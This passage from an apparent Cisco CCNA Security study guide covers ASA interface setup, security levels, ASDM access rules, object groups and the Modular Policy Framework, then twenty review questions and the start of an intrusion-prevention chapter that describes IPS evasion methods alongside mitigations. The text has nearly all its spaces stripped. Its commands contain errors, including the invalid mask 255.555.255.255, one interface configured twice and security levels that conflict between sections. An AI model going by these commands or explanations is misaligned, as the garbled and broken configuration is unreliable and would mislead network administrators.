asa70(config)#intgi0/2
asa70(configif)#ipaddress172.168.5.5255.255.255.0
asa70(configif)#nameifdmz
asa70(configif)#noshutdown
asa70(config)#intgi0/3
asa70(configif)#ipaddress192.168.5.5255.255.255.0
asa70(configif)#nameifinside
asa70(configif)#noshutdown
7. NowweneedtoenabletheHTTPserverontheASA,whichisrequiredtoconnecttothedeviceusingtheASDM.
asa70(config)#httpserverenable
8. NowwewilldefineanIPaddressontheinsidenetworkthatwillbeallowedtoconnecttotheASAusingeitherSSHorHTTPtomanagetheASA.
asa70(config)#http192.168.5.20255.555.255.255inside
asa70(config)#ssh192.168.5.20255.555.255.255inside
9. Finallywe’llcreatealocalaccountontheASAforthetechnicianwhowillconnectusingHTTPorSSHandenablelocalauthenticationontheASA.TheusernamewillbeBobandthepasswordpassbob.Givehimlevel15(admin)access.
asa70(config)#usernamebobpasswordpassbobencryptedprivilege15
10. Normallyatthispointonewouldalsoconfigureasecuritylevel.Wewilldothatinthenextexerciseafterwediscusssecuritylevels.
ConfiguringCiscoASAInterfaceSecurityLevelsBeforewegetintointerfaceconfigurationweneedtodiscussaconceptthatmaybenewtoyou
ifyouhaveonlyconfiguredrouters.IntheASAinterfaceshavesecuritylevels.ThesesecuritylevelsareoneofthewaystheASAcontrolsaccessfromoneinterfacetoanother.Securitylevelsdefinethetrustworthinessoftheinterface.Thehigherthelevelthemoretrustedtheinterface.
SecurityLevelsThemostcommonconfigurationistosettheexteriorinterface(Internet)toalevelofzero(orsomethingverylowinrelationtotheotherinterfaces)andtheinteriorinterface(LAN)toaveryhighsecuritylevelvalue.Anyotherinterfaces(suchasaDMZ)canbesettoalevelthatproperlyreflectsthetrustplacedinthatinterface.Withthisconfigurationinplacethetypicaltrafficflowsinyournetworkwillbeasfollows:
Inboundtrafficwillflowfromalow-securityinterfacetoahigh-securityinterface.Anotherwayofsayingthisisthatitwillflowfromalesstrustedinterfacetoamoretrustedinterface.
Outboundtrafficwillflowfromahigh-securityinterfacetoalow-securityinterface.Anotherwayofsayingthisisthatitwillflowfromamoretrustedinterfacetoalesstrustedinterface.
Bydefault,theASAusestheserulestocontroltrafficbetweeninterfaces:
Thereisanimplicitpermitfortrafficflowingfromahigh-securityinterfacetoalow-securityinterface.
Thereisanimplicitdenyfortrafficflowingfromalow-securityinterfacetoahigh-securityinterface.
Thereisanimplicitdenyfortrafficflowingbetweentwointerfaceswiththesamesecuritylevel.
Ofcourse,thesedefaultscanbechangedandoftenarechanged.Figure15.5showshowthiswouldworkusingsecuritylevelvalues0,50,and100.Greenlinesrepresentallowedtrafficwhiletheredlinesrepresentdeniedtraffic.
FIGURE15.5Securitylevelsinaction
SettingSecurityLevels
Inthisprocedure,youwillconfiguretheinterfacesoftheASAsecuritylevelsreflectingtherelativetrustworthinessoftheinside,outside,anddmzinterfaces.Theinterfacesinthisprocedurealignwiththelastprocedure,NOTwithFigure15.5,whichisadifferentexample.
1. Enterinterfaceconfigurationmodefortheinside,outside,anddmzinterfacesandassignthesecuritylevels100,50,and0respectively.
asa70(config)#intgi0/3
asa70(config)#security-level100
asa70(config)#intgi0/2
asa70(config)#security-level50
asa70(config)#intgi0/3
asa70(config)#security-level0
AtthispointyoushouldbeabletoconnecttotheASAusingtheASDMasBobfromthemachineat192.168.5.20.
ConfiguringSecurityAccessPoliciesInitsroleasafirewalltheASAusessecurityaccesspoliciestocontroltraffictypesallowedtoflowfromoneinterfacetoanother.Theseaccesspoliciescanbeconfiguredasinterfaceaccessrules(muchliketheACLsyoumayhaveexperiencewithonarouter)orbycreatingandlinkingobjectgroups.Inthissection,we’lldiscussbothmethods.
InterfaceAccessRulesIfyouapplynointerfaceaccessrulesontheASAthedefaultrules(ascoveredearlier)are:
Thereisanimplicitpermitfortrafficflowingfromahigh-securityinterfacetoalow-securityinterface.
Thereisanimplicitdenyfortrafficflowingfromalow-securityinterfacetoahigh-securityinterface.
Thereisanimplicitdenyfortrafficflowingbetweentwointerfaceswiththesamesecuritylevel.
Thismeansthatyouwillneedtocreateanaccessruletoallowtrafficineachofthefollowingscenarios:
Betweeninterfacesofthesamesecuritylevel
Trafficfromalower-securityinterfacetoahigher-securityinterface
WhenUsingNAT!
ACLsthatpermittrafficfromalower-securityinterfacetoahigher-security
interfacemustreferencethe“real”ornon-translatedIPaddressoftheinsidehostratherthanthetranslatedormappedIPaddress.
WhileinterfacerulesoperatelikeACLsyoumay(dependingonyourCLIexperiencewiththeASA)finditeasiertocreatetheserulesintheASDMratherthanatthecommandline.Inthenextprocedure,youwillseehowthisisdoneintheASDM.
CreatingInterfaceAccessRulesinASDMInthisprocedure,youwillconfiguretwointerfaceaccessrulesintheASDM.TheASAyoumanagehasthreeinterfacesthatyouhavelabeledinside(LAN),outside(Internet),anddmz.Thesecuritylevelsyouhaveassignedare100,0,and50respectively.Currentlytheonlyrulesinplacearetheglobaldefaultrulesdiscussedinthefirstsetofbulletpointsinthesection“InterfaceAccessRules”earlierinthissection.
Youneedtoconfigurethefollowingrules:
AllowonlyHTTPaccessfromtheoutsideinterfacetothedmz.
AllowonlyHTTPfromtheinsidetothedmz.
1. ConnecttotheASAwiththeASDM.
2. NavigatetoConfiguration Firewall AccessRules.
3. ClickAdd,andchooseAddAccessRule.
4. WewillfirstcreatetheruleallowingonlyHTTPaccessfromtheoutsideinterfacetothedmz.IntheAddAccessRuledialogbox,selectoutsideastheinterfaceonwhichtoapplytherule.IntheActionsection,selectthePermitradiobutton.Inthedrop-downboxforsourceIPaddress,selectANY.Inthedrop-downboxfordestinationIPaddress,selectANY.IntheServicebox,typeorselectHTTP.ClickOK.OntheASDMmainpage,clickApply.
5. ClickAdd,andchooseAddAccessRule.
6. WewillnextcreatetheruleallowingonlyHTTPaccessfromtheinsideinterfacetothedmz.IntheAddAccessRuledialogbox,selectinsideastheinterfaceonwhichtoapplytherule.IntheActionsection,selectthePermitradiobutton.Inthedrop-downboxforsourceIPaddress,selectANY.Inthedrop-downboxfordestinationIPaddress,selectANY.IntheServicebox,typeorselectHTTP.ClickOK.OntheASDMmainpage,clickApply.
Theconfigurationisnowcomplete.
ObjectGroupsWhilethepreviousprocedureusedthekeywordANYtoselectsourceanddestinationandHTTPforservice,notverymanyconfigurationsarethatsimple.Inmanycasesweneedtoallowonlyaselectgroupofdevicesratherthanalldevices,orweneedonlyallowdevicesonaspecificnetworktosendtrafficonaninterfacewhentherearemultiplenetworksthatmightbetraversingthatinterface.Tomakethecreationandapplicationofruleseasier,theASAcanalsouseanobject-basedmodelforcertainrules.
Objectscanbecreatedtorepresentanyofthefollowing:
Networks
Individualhosts
Groupsofservices
Resources
Oncetheseobjectshavebeencreated,theycanbelinkedtogethertocreaterulesaswedidinthepreviousprocedureandsimplyusethebrowsebuttonnexttoeachofthedrop-downboxesintheAddAccessRuledialogboxtolinkthemtogether.Inthenextprocedure,youwillcreateobjectsandthenusetheminanaccessrule.
CreatingandUsingObjectsinanAccessRuleInthisprocedure,youwillcreatethreeobjectsandusetheminanaccessrule.YouneedtoallowHTTPtrafficfromthe192.168.5.0/24networkinsidetheLANtoawebserverwiththeIPaddressof201.3.3.3intheDMZ.Therefore,youwill
Createanetworkobjecttorepresentthe192.168.5.0/24network
CreateaserviceobjecttorepresentHTTP
Createahostobjecttorepresenttheserverat201.3.3.3
Linktheseobjectsinanaccessruleandapplyittotheinsideinterface
Note:interfaceobjectshavebeencreatedandnamedinside,outside,anddmzwithsecuritylevelsof100,0,and50.
1. ConnecttotheASAwiththeASDM.
2. NavigatetoConfiguration Firewall Objects NetworkObjects/Groups.
3. SelectAdd,thenNetworkObject.
4. IntheNamefield,enterHTTP_group_internal.
5. IntheIPaddressandnetworkmasksections,enter192.168.5.0and255.255.255.0.ThenselectOK.
6. SelectAdd,thenNetworkObjects/Groups.
7. IntheNamefield,enterDMZ_web.
8. IntheIPaddresssection,enter201.3.3.3.ThenselectOK.
9. SelectObject,thenServiceObjects/GroupsandfinallyAddServiceGroup.
10. IntheAddServiceGroupdialogbox,enteranameforDMZ_services.
11. IntheExistingservicegroupsection,selectTCP-HTTPandTCP-HTTPSandselectAdd.ThenclickOK.
12. InthemainASDMwindow,selectApplytocreatetheobjects.
13. NavigatetoConfiguration Firewall AccessRules.
14. ClickAdd,andchooseAddAccessRule.
15. IntheAddAccessRuledialogbox,selectinsideastheinterfaceonwhichtoapplytherule.IntheActionsection,selectthePermitradiobutton.Inthedrop-downboxforsourceIPaddress,selecttheobjectyoucreatedcalledHTTP_group_internal.Inthedrop-downboxfordestinationIPaddress,selecttheobjectyoucreatedcalledDMZ_web.IntheServicebox,selecttheobjectyoucreatedcalledDMZ_services.ClickOK.OntheASDMmainpage,clickApply.
Theconfigurationisnowcomplete.
ConfiguringDefaultCiscoModularPolicyFramework(MPF)InChapters4and14youlearnedabouttheCiscoModularPolicyFramework(MPF).Asreview,therearethreecomponentsthatareusedasbuildingblockstoimplementpoliciesinthisframework:
Classmapsareusedtocategorizetraffictypesintoclasses.ACLsaretypicallyusedtodefinethetrafficandthentheACLisreferencedintheclassmap.
Policymapsareusedtodefinetheactiontobetakenforaparticularclass.Actionsthatcanbespecifiedareallow,block,andrate-limit.
Servicepoliciesareusedtospecifywherethepolicy-mapshouldbeimplemented.
Inthenextprocedure,youwillusethisframeworktocreateanewpolicybycreatingaclassmapthatidentifiesTelnetasthetrafficandapolicymapthatidentifiesanactionofdenyandapplythetwotoallinterfaceswithaservicepolicy.
ConfiguringDefaultCiscoModularPolicyFramework(MPF)Inthisexercise,youwillcreateanewpolicybycreatingaclassmapthatidentifiesTelnetasthetrafficandapolicy-mapthatidentifiesanactionofdenyandapplythetwotoallinterfaceswithaservicepolicy.
1. ConnecttotheASAwiththeASDM.
2. NavigatetoConfiguration Firewall ServicePolicyRulesandclickAdd,thenServicePolicyrule.
3. NametheservicepolicyNo_telnetandselecttheGlobalradiobutton(whichappliesittoallinterfaces).ClickNext.
4. IntheTrafficClassCriteriadialogbox,selectCreateANewTrafficClass.NametheclassTelnet_deny.
5. IntheTrafficMatchCriteriasection,checktheboxforTCPOrUDPDestinationPortandselectNext.
6. IntheservicefieldofthenextboxenterTCP/23inboththeSourceandDestinationfields.ClickNext.
7. SelectFinish.Theconfigurationiscomplete.
SummaryInthischapter,youlearnedhowtosetuptheASAsoyoucanremotelyadministeritusingtheASDM.Youalsolearnedthedefaultsecuritypoliciesthatareinplaceandhowthedefaultglobalpolicyinteractswithconfiguredpolicies.Youalsolearnedaboutinterfacesecuritylevelsandtheeffecttheyhaveontrafficflows.ThechapterreviewedtheCiscoModularPolicyframeworkandhowitisusedtocreatepolicies.Italsodiscussedthedifferencebetweenatransparentandroutedfirewall.Finally,high-availabilitysolutionswereintroducedincludingactive-active,active-passive,andclusteringapproaches.
ExamEssentialsIdentifyfirewallservicesprovidedbytheASA.TheseincludeApplicationInspectionControl(AIC),NetworkAddressTranslation(NAT),IPRouting,IPv6support,DHCP,andMulticastsupport.
DescribethetwomodesofdeployingtheASA.TheASAcanbedeployedinoneoftwomodes,routedandtransparent.Inroutermode,theASAisservingasarouterandthuseachofitsinterfaceswillresideinaseparateIPsubnet.Intransparentmode,theASAisnotactingasarouterandassumesalayer2identitymuchasaswitchdoes.
IdentifyASAhigh-availabilitymethods.TheseincludeActive/Standbyfailover,
Active/Activefailover,andclustering.
DefinesecuritycontextsintheASA.TheASAcanbepartitionedintomultiplevirtualfirewallsorsecuritycontexts.Eachcontextcanhaveitsowninterfaces,policies,andadministrators.
DescribethestepsrequiredforinitialsetupoftheASA.ThesestepsincludeassigninganIPaddressandmasktointerfaces,enablinginterfaces,andenablingtheHTTPserver.TheyalsoincludepermittingtheremotemanagementtrafficgeneratedwhenconnectingwiththeASDM.
ListthedefaulttrafficrulesintheASA.Bydefault,theASAusestheserulestocontroltrafficbetweeninterfaces:thereisanimplicitpermitfortrafficflowingfromahigh-securityinterfacetoalow-securityinterface,thereisanimplicitdenyfortrafficflowingfromalow-securityinterfacetoahigh-securityinterface,andthereisanimplicitdenyfortrafficflowingbetweentwointerfaceswiththesamesecuritylevel.
IdentifyexamplesofitemsforwhichobjectscanbecreatedintheASA.Objectscanbecreatedtorepresentanyofthefollowing:networks,individualhosts,groupsofservices,orresources.
DescribethecomponentsoftheCiscoModularPolicyFramework(MPF).Therearethreecomponentsthatareusedasbuildingblockstoimplementpoliciesinthisframework:classmaps,usedtocategorizetraffictypesintoclasses(ACLsaretypicallyusedtodefinethetrafficandthentheACLisreferencedintheclassmap);policymaps,usedtodefinetheactiontobetakenforaparticularclass(actionsthatcanbespecifiedareallow,block,andrate-limit);andservicepolicies,usedtospecifywherethepolicymapshouldbeimplemented.
ReviewQuestions1. Whichfirewallfeaturecanhelppreventmanytunnelingattemptsandapplicationlayer
attacks?
A. AIC
B. NAT
C. DHCP
D. PIM-SIM
2. InwhichmodedoestheASAassumealayer2identity?
A. Switch
B. Transparent
C. Active/Standby
D. Routed
3. Inwhichhigh-availabilityapproacharethreeormoresecurityappliancesdeployedasa
singlelogicaldevice?
A. Active/Active
B. Stackwise
C. Clustering
D. Active/Standby
4. WhatisitcalledwhentheASAispartitionedintomultiplevirtualfirewalls?
A. securitycontexts
B. securitydomains
C. securityrealms
D. securityareas
5. WhichcommandisusedtoapplythenameoutsidetoaninterfaceontheASA?
A. asa70(config-if)#nameoutside
B. asa70(config-if)#nameifoutside
C. asa70(config-if)#outside
D. asa70(config)#nameifoutside
6. WhichcommandisrequiredtoconnecttothedeviceusingtheASDM?
A. asa70(config)#httpserver
B. asa70(config)#httpenable
C. asa70(config)#httpserverenable
D. asa70(config)#enablehttpserver
7. WhichcommanddefinesanIPaddressontheinsidenetworkthatwillbeallowedtoconnecttotheASAusingHTTPtomanagetheASA?
A. asa70(config)#http192.168.5.20255.555.255.255
B. asa70(config)#http192.168.5.20/32inside
C. asa70(config)#http192.168.5.20inside
D. asa70(config)#http192.168.5.20255.555.255.255inside
8. WhatvalueisusedtodeterminetheallowedtrafficflowsbetweentheinterfacesintheASA?
A. securitylevel
B. IPaddress
C. MACaddress
D. name
9. Thereisanimplicitpermitfortrafficflowingfroma_______securityinterfacetoasecurity________interface.
A. low,low
B. high,low
C. high,high
D. low,high
10. Whichcommandassignsthesecuritylevel100toaninterface?
A. asa70(config)#security100
B. asa70(config)#100security-level
C. asa70(config)#security-level100
D. asa70(config)#level100
11. Inwhichofthefollowingscenarioswillyouneedtocreateanaccessruletoallowtraffic?
A. betweeninterfacesofthesamesecuritylevel
B. traffictotheself-zone
C. trafficfromahigher-securityinterfacetoalower-securityinterface
D. inallscenarios
12. Whichofthefollowingisusedtorepresentaselectgroupofdevicesratherthanalldevicesinanetwork?
A. servicepolicy
B. objectgroup
C. policymap
D. securitygroup
13. WhichofthefollowingisusedtocategorizetraffictypesintheMPF?
A. zonepairs
B. zones
C. policymaps
D. classmaps
14. YouwouldliketoapplyaservicepolicytoallinterfacesoftheASA.WhatradiobuttondoyouchooseforthisintheASDM?
A. global
B. composite
C. self
D. all
15. YouneedtoallowHTTPtrafficfromthe192.168.5.0/24networkinsidetheLANtoawebserverwiththeIPaddressof201.3.3.3intheDMZ.WhattypeofobjectdoyoucreatetorepresenttheHTTPtraffic?
A. networkobject
B. serviceobject
C. hostobject
D. resourceobject
16. WhichofthefollowingisusedtospecifywhereapolicymapshouldbeimplementedintheMPF?
A. zonepairs
B. zones
C. servicepolicy
D. classmaps
17. TheASAyoumanagehasthreeinterfacesthatyouhavelabeledinside(LAN),outside(Internet),anddmz.Thesecuritylevelsyouhaveassignedare100,0,and50respectively.Currentlytheonlyrulesinplacearetheglobaldefaultrules.Whichtrafficisallowed?
A. insidetooutside
B. outsidetodmz
C. dmztooutside
D. insidetodmz
18. Inthefollowingcommandoutputwhatdoesinsiderepresent?asa70(config)#ssh192.168.5.20255.555.255.255inside
A. ACLname
B. securitylevel
C. interfaceIPaddress
D. trafficdirection
19. WhichofthefollowingisusedtodefinetheactiontobetakenforatraffictypeintheMPF?
A. zonepairs
B. zones
C. policymaps
D. classmaps
20. Thereisanimplicitdenyfortrafficflowingfroma________securityinterfacetoa________interface.
A. low,low
B. high,low
C. high,high
D. low,high
Chapter16IntrusionPreventionCISCOCCNASECURITYEXAMOBJECTIVESCOVEREDINTHISCHAPTER:
6.1DescribeIPSdeploymentconsiderations
Network-basedIPSvs.host-basedIPS
Modesofdeployment(inline,promiscuous-SPAN,tap)
Placement(positioningoftheIPSwithinthenetwork)
Falsepositives,falsenegatives,truepositives,truenegatives
6.2DescribeIPStechnologies
Rules/signatures
Detection/signatureengines
Triggeractions/responses(drop,reset,block,alert,monitor/log,shun)
Blacklist(staticanddynamic)
Itisnolongeracceptabletositandwaitforthenextattackandreactafterward.Intoday’sthreat-filledlandscape,securityprofessionalsmusttakeaproactiveapproachtopreventingintrusions.Intrusionpreventionsystemsaredesignedtoidentifyandpreventattacksinrealtime.Inthischapter,youwillexploretheintrusionpreventioncapabilitiesoftheASA.
Inthischapter,youwilllearnthefollowing:
DeploymentoptionsofanIPS
AdvantagesanddisadvantagesofanHIPSandanNIPS
ProperpositioningofanIPS
Managementoffalsepositivesandnegatives
Threatidentificationmethods
Methodsofimplementinghighavailability
Triggeractions
IPSTerminologyTobeginthischapter,you’lllearnanumberoftermsandconceptsthatapplytotheprocessofintrusionprevention.Aclearunderstandingofthesewillhelpsupporttherestofthechapter.
ThreatAthreatisanidentifiedsecurityweaknesstowhichanyspecificenvironmentmayormaynotbevulnerable.Forexample,athreatmightexistintheformofanewattackonOracledatabaseservers,butifyouuseMicrosoftSQLServer,itisathreattowhichyouarenotvulnerable.Riskispresentonlywhenathreatandavulnerabilitytothethreatbothexist.
RiskRiskiscreatedwhenathreatexiststowhichasystemisvulnerable.Unlessthesetwoconditionsarebothpresent,noriskexists.
VulnerabilityAvulnerabilityisanysusceptibilitytoanexternalthreatthatadeviceorsystemmaypossess.Athreatbecomesavulnerabilityonlywhenthethreattargetispresentinyourenvironmentandisinthestaterequiredtotakeadvantageofthevulnerability.Forexample,ifathreattoafileserverexistsonlyifthefileserverislackingasecuritypatchandyourfileserverhasthepatchinstalled,thethreatisnotavulnerability.Examplesofvulnerabilitiesincludethefollowing:
Weakpasswords
Missingsecuritypatches
Lackofinputvalidation
ExploitAnexploitoccurswhenathreatandavulnerabilitybothexistandathreatactortakesadvantageofthesituation.Thetermexploitalsoreferstothespecifictoolorattackmethodologyused.Someexamplesincludethefollowing:
Scripts
Malware
Passwordcrackers
Zero-DayThreatAzero-daythreatisanythreatnotyetremediatedbymalwarevendorsorsoftwarevendors.Thistypeofthreatcannotbedetectedthroughattacksignature-basedmethodsandisusuallydiscoveredonlybymalwareorIPS/IDSsoftwarethatusesheuristics.Thisapproachidentifiesattacksbyidentifyingtrafficthatisconsistentwithanattackratherthanusingasignature.
ActionsActionsrefertotheoperationsthatanintrusionpreventionsystem(IPS)cantakewhenanattackisrecognized.Someexamplesoftheseactionsareasfollows:
DropsmeanstheIPSquietlydropsthepacketsinvolved.
ResetsendsapacketwiththeRSTflagthatendsanyTCPconnection.
Shunaccomplishesthesamepurposeasaresetfornon-TCPconnections.
BlockiswhentheIPSdirectsanotherdevice(arouterorfirewall)toblockthetraffic.
Network-BasedIPSvs.Host-BasedIPSThemostcommonwaytoclassifyanIPSisbasedonitsinformationsource:networkbasedandhostbased.Ahost-basedintrusiondetectionsystem(HIPS)isinstalledonthedevice(forthepurposesofthisdiscussion,aserver),andthesystemfocusessolelyonidentifyingattacksonthatdeviceonly.Thisisincontrasttoanetwork-basedsystem,whichmonitorsalltrafficthatgoesthroughitlookingforsignsofattackonanymachineinthenetwork.
Host-BasedIPSAnHIPScanbeconfiguredtoalsofocusonattacksthatmayberelevanttotherolethattheserverisperforming(forexample,lookingforDNSpollutionattacksonDNSservers).Buttherearedrawbackstothesesystems.
Ahighnumberoffalsepositivescancausealaxattitudeonthepartofthesecurityteam.
Constantupdatingofsignaturesisneeded.
There’salagtimebetweenthereleaseoftheattackandthereleaseofthesignature.
AnHIPScannotaddressauthenticationissues.
Encryptedpacketscannotbeanalyzed.
Insomecases,IPSsoftwareissusceptibleitselftoattacks.
Despitetheseshortcomings,anHIPScanplayanimportantroleinamultilayerdefensesystem.
Network-BasedIPSAnetwork-basedIPS(NIPS)monitorsnetworktrafficonalocalnetworksegment.Thisisincontrasttoahost-basedIPS(HIPS)thatmonitorsasinglemachine.
OneofthedisadvantagesofanNIPS(whichisanadvantageofanHIPS)isthatitcannotmonitoranyinternalactivitythatoccurswithinasystem,suchasanattackagainstasystemthatiscarriedoutbyloggingontothesystem’slocalterminal.
MostIPSsareprogrammedtoreactincertainwaysinspecificsituations.EventnotificationandalertsarecrucialtoIPSs.Thesenotificationsandalertsinformadministratorsandsecurity
professionalswhenandwhereattacksaredetected.
PromiscuousModeTomonitortrafficonthenetworksegment,thenetworkinterfacecard(NIC)mustbeoperatinginpromiscuousmode.Moreover,anNIPSisaffectedbyaswitchednetworkbecausegenerallyanNIPSmonitorsonlyasinglenetworksegment,andeachswitchportisaseparatecollisiondomain.
DetectionMethodsThesesystemscanuseseveralmethodsofdetectingintrusions.Thetwomainmethodsareasfollows:
SignatureBasedAnalyzestrafficandcomparespatterns,calledsignatures,thatresidewithintheIDSdatabase.Thismeansitrequiresconstantupdatingofthesignaturedatabase.
AnomalyBasedAnalyzestrafficandcomparesittonormaltraffictodeterminewhetherthetrafficisathreat.Thismeansanytrafficoutoftheordinarywillsetoffanalert.
EvasionTechniquesWhileIPSscandosomeamazingthings,theyarenotinfallible.SeveraltechniqueshavebeendevelopedovertheyearsbymaliciousindividualsthatallowthemtogetmaliciouscodepasttheIPS.Someofthemorecommonapproachesarecoveredinthissection.
PacketFragmentationPacketfragmentationistheprocessofbreakingapacketthatislargerthanthemaximumtransmissionunit(MTU)intosmallerpiecescalledfragmentsthatabidebythesizelimitsoftheMTU.VariousnetworkingtechnologiesenforcedifferentMTUs.Forexample,whiletheMTUinEthernetis1,500bytes,inanFDDInetworktheMTUis4,470bytes.
RoutersonthenetworkenforcetheMTUandperformfragmentationofpacketsasneededtomeettheMTU.Whenthefragmentsarriveatthedestination,theyarereassembled.Tocommunicateexactlyhowthereassemblyshouldoccur,severalheaderfieldsareusedintheIPheader.Figure16.1showstheIPheader.
FIGURE16.1IPheaderfragmentationflags
Threefieldsareofinterest.
Identificationprovidesanumberthatidentifiespacketsthatbelongtothesametransmissionthatneedtobereassembled.
Flagisafieldconsistingofthreebits.AsshowninFigure16.1,thefirstbitposition0isreservedandnotusedinthefragmentationprocess;thesecondpositionwhencheckedmeansdon’tfragmentthispacket,inwhichcaseifthepacketisoversized,anICMPmessagewillbesenttothesourceindicatingitcannotbesentwithoutfragmentation.Thethirdpositionwhencheckedmeansthispacketispartofaseriesoffragmentsandtherearemoretocome.Ifthisisthelastfragmentinaseriesoffragments,thisbitwillnotbechecked.
FragmentOffsetvaluesindicatestothereassemblinghostwherethisfragmentbelongs.Itdoessobyindicatinghowmanybytesawayfromthebeginningofthepayloadthefragmentis.
Thefragmentationprocessfollowsthissequence:
1. Aroutermakesthedecisionthatapacketmustbefragmented.
2. Theroutersplitsthepacketintofragments,eachwithanidenticalIPheaderapartfromtheflagbitsandtheoffsetvalues.
3. Thedestinationreassemblesthefragments.Itrecognizesthefirstfragmentbecauseithasanoffsetvalueof0.Itthenusestheoffsetvaluesofeachfragmenttoproperlypositionthefragments.ItrecognizesthelastfragmentbecausetheMoreFragmentsbitisoff.
ThisprocessisillustratedinFigure16.2,whereanMTUof3,300bytesisenforcedonapacketthatis11,980bytes.Asyoucansee,thefirstfragmentisgivenanOffsetof0andtheMoreFragmentsbitison,indicatingmorefragmentstothereceiver.Thesecondpackethasan
Offsetvalueof410andhastheMoreFragmentsbiton.ThethirdandfinalfragmenthasanOffsetvalueof820,andsinceitisthelastfragment,theMoreFragmentsbitisoff.
FIGURE16.2Fragmentationprocess
So,howdoesthefragmentationattackwork?TheattackerfragmentsthepacketcontainingthemaliciouscodesothatitbecomesdifficultfortheIPStorecognizethecodeinsuchafragmentedfashion.ThisprocessisshowninFigure16.3,whereamaliciousCGIscriptthat,asshownintheoriginalIPpacketatthetop,wouldprobablyberecognizedbytheIPSissplitintofragmentsthatmaynotberecognizedbytheIPS.(Itisnotimportanttounderstandthescript.)Inthiscase,atoolcalledfragroutewasusedtosplitthepacketintofragments.
FIGURE16.3Fragmentationattack
Themitigationstothisattackaretodothefollowing:
UseanIPSthatperformssignatureanalysisagainsttheentirepacketratherthanindividualfragments.Thisrequirestheabilitytoperformstreamreassembly.
Useprotocolanalysistoevaluatetheentirepacketforviolationofprotocolstandards.
InjectionAttacksInaninjectionattack,theattackerinsertsdatathatwillbeacceptedbytheIPSbutwillbeignoredbythetargetsystem.OneapproachtakesadvantageoftheTTLfeatureofIPandfragmentation.Thetime-to-live(TTL)valueisusedinIPtopreventapacketfromloopingendlessly.Whenapacket’sTTLvaluegoestozero(decrementedateachhop),itgetsdroppedbytherouter.
Intheattack(asshowninFigure16.4),theattackerinjectsabogusstringintotheattackcodeandthenbreakstheattackintothreefragments.ThenhemanipulatestheTTLvalueofthefragmentcontainingthebogusstringinsuchawaythatthefragmentdies(andnevergetsdelivered)beforeitreachesthedestination.IftheIPSdoesnotconsiderthefragmentoffsetvaluesorTTLvalues,itwilldetectthebogusstringratherthantheactualpayload.TheresultisthatafterinspectionbytheIPS,thebogusstringdoesnotgetdelivered.Theattackpayloaddoes.
FIGURE16.4Injectionattack
Mitigationstothisattackareasfollows:
UseanIPSthatperformsstreamreassembly,whichallowstheIPStorecognizetheattack.
UseanIPSthatperformsTTLvalueassessment,whichallowstheIPStorecognizethelowerTTLforthefragmentcontainingthebogusstring.
AlternateStringExpressionsInmanyprotocols,informationcanbecommunicatedorexpressedinmultipleways.Forexample,HTTPcanacceptstringsexpressedinhexadecimal,Unicode,orstandardtextexpressions.AttackerscanusethistoevadeanIPSsensor.IftheIPScannotperformprotocolnormalization(whichdecodesthepayloadtodiscoveritssignificance),thisattackmaysucceed.
Mitigationstothisattackareasfollows:
Protocolanalysis
Protocolnormalization
IntroducingCiscoFireSIGHT
CiscoFireSIGHToffersthreatprotectioncapabilitiesthatgobeyondmostIPSs.Itnotonlydetectsandtakesactiontopreventattacks,itenablesabetterunderstandingoftheexposuresyourenvironmentmaypossessandhelpsyoutotakecorrectiveactionstoeliminatethem.ThissectionsurveysthecapabilitiesofFireSIGHTandtheroleitcanplayatvariousstagesofanattack.
CapabilitiesTherearefourcategoriesoffunctionsofwhichFireSIGHTiscapable.
Detection:Attackdetectiontechnologiesincludethefollowing:
IPS:Monitorsformaliciousandsuspiciousactivity.
Discovery:Enablesvisibilityintoallhosts,services,andapplicationsrunningonthenetwork.Thisincludestrafficdiscoveryinwhichyoucanidentifythewaysinwhichresourcesarebeingutilized.
Learning:Reportsonthestateoftheenvironmentanddetectswhenchangesoccurinrealtime.
Adapting:Whenchangesaredetected,FireSIGHTcanadaptitsconfigurationtomitigatenewrisks.
Acting:Actionsthatareavailableincludethefollowing:
Block,alert,ormodifysuspicioustraffic
Remediatethroughcustomresponsessuchasblockingadownstreamrouterorscanningadevice
Automateresponseandreporting
FireSIGHTismanagedusingtheFireSIGHTManagementCenter.ThisapplicationcanbehostedonaFireSIGHTManagementCenterapplianceorhostedonavirtualapplianceonaVMwareserver.
ProtectionsTheoperationsandfeaturesofFireSIGHTarebestdescribedintermsofhowtheywouldbeutilizedduringanattack.Therefore,youwilllookattheseprotectionsinthisway.
BeforeanAttackThebestwaytomitigateattacksistoaddressthembeforetheyoccur.FireSIGHTprovidesthefollowingpreventativetechnologiesforthis:
Blacklisting:TraffictoandfromspecificIPaddressescanbeblacklisted,whichmeansthatyourtrafficwillbeneithersenttonorreceivedfromtheIPaddress.WhenyouidentifyproblematicIPaddresses,thisisanactionyoutake.Moreover,theFireSIGHTManagementCentercandynamicallydownloadatconfigurableintervalsacollectionofIP
addressesthathavebeenidentifiedbyathreatintelligenceteamcalledTalos(https://www.talosintelligence.com/)ashavingabadreputationinthisregard.Youcanchoosetoaddthesetothislistifdesired.AdvancedMalwareProtection(AMP):TwoAMPproductsareincluded.CiscoAMPforEndpointsiscomposedofconnectorsinstalledonendpoints.Itusesacloud-baseddetectionprocessthatoffloadsthedetectionburdentothecloud.CiscoAMPforNetworksusesFirePOWER(coveredindetaillaterinthischapter)appliancestodetectmalwareintransit.Italsocanutilizethecloudforthelatestmalware.ThesystemcanalsostoredetectedfilesforsubmissiontotheCiscoCollectiveSecurityIntelligenceCloudfordynamicanalysis.
DuringanAttackWhileFireSIGHTusestheaforementionedmethodstopreventattacks,preventionisnotalwayspossible.Onceanattackisunderway,theFireSIGHTIPSprimarilytakesactionsbyidentifyingandblockingmalicioustraffic.TheIPSisapolicy-basedfeaturethatallowsformonitoringandblockingoralteringmalicioustrafficwhentheIPSisdeployedinline(deploymentoptionsarecoveredinthenextsectionofthischapter).
FireSIGHTusesSnorttechnology(anIDS).Thistechnologymakesuseofpreprocessors,whichexaminetrafficandinsomecasesmodifythetrafficinsuchawaythatattacksthatcannotberecognizedbythesignaturecanberecognized.Forexample,onepreprocessorhelpstorecognizemaliciouscodehiddenbyanIPfragmentationattack.
AnIPSpolicyconsistsofthefollowing:
Rulesthatinspecttheheadercontent,packetsize,andpayload
RulestateconfigurationbasedonFireSIGHTrecommendations
Preprocessorsandotherdetectionfeatures
FireSIGHTalsogeneratesintrusioneventinformationinalogthatincludesdetailssuchasthefollowing:
Dateandtime
Eventpriority
Briefdescription
Nameofthedevice
SourceIPaddressandportfortheevent
DestinationIPaddressandportfortheevent
Nameofthelogged-inuser
Impactflag
